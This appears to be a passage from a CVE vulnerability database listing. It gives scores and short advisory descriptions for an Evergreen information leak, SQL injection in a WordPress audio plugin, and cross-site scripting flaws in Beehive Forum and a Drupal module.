36697 | CVE-2015-2203 | 200 | - | +Info | 2018-02-01 | 2018-02-15 | 4.0 | None | Remote | Low | Single system | Partial | None | None
Evergreen 2.5.9, 2.6.7, and 2.7.4 allows remote authenticated users with STAFF_LOGIN permission to obtain sensitive settings history information by leveraging listing of open-ils.pcrud as a controller in the IDL.

36698 | CVE-2015-2199 | 89 | 1 | Exec Code Sql | 2015-03-03 | 2015-03-04 | 6.5 | None | Remote | Low | Single system | Partial | Partial | Partial
Multiple SQL injection vulnerabilities in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow (1) remote authenticated users to execute arbitrary SQL commands via the item[id] parameter in a wonderplugin_audio_save_item action to wp-admin/admin-ajax.php or remote administrators to execute arbitrary SQL commands via the itemid parameter in the (2) wonderplugin_audio_show_item, (3) wonderplugin_audio_show_items, or (4) wonderplugin_audio_edit_item page to wp-admin/admin.php.

36699 | CVE-2015-2198 | 79 | 1 | XSS | 2015-03-03 | 2015-03-04 | 4.3 | None | Remote | Medium | Not required | None | Partial | None
Multiple cross-site scripting (XSS) vulnerabilities in edit_prefs.php in Beehive Forum 1.4.4 allow remote attackers to inject arbitrary web script or HTML via the (1) homepage_url, (2) p_url, or (3) avatar_url parameter, which are not properly handled in an error message.

36700 | CVE-2015-2197 | 79 | - | XSS | 2015-03-03 | 2015-03-04 | 3.5 | None | Remote | Medium | Single system | None | Partial | None
Cross-site scripting (XSS) vulnerability in the Entity API module before 7.x-1.6 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via a field label in the Token API.